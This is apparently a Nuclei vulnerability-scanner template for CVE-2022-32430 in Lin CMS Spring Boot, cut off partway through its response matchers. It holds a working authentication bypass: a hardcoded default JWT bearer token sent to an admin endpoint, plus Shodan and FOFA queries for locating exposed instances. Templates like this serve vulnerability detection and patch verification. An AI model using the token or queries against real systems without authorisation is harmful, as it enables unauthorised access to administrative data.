id: CVE-2022-32430 info: name: Lin CMS Spring Boot - Default JWT Token author: DhiyaneshDK severity: high description: | An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application. reference: - https://github.com/TaleLin/lin-cms-spring-boot - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277 - https://nvd.nist.gov/vuln/detail/CVE-2022-32430 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-32430 epss-score: 0.00227 epss-percentile: 0.60316 cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: talelin product: lin-cms-spring-boot shodan-query: http.html:"心上无垢,林间有风" fofa-query: body="心上无垢,林间有风" tags: cve,cve2022,lin-cms,auth-bypass,talelin http: - method: GET path: - "{{BaseURL}}/cms/admin/group/all" headers: Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8 matchers-condition: and matchers: - type: word part: body words: - '"id":' - '"name":' - '"level":' condition: and - type: word part: header words: - 'application/json' - type: status status: - 200 - type: word part: body words: - '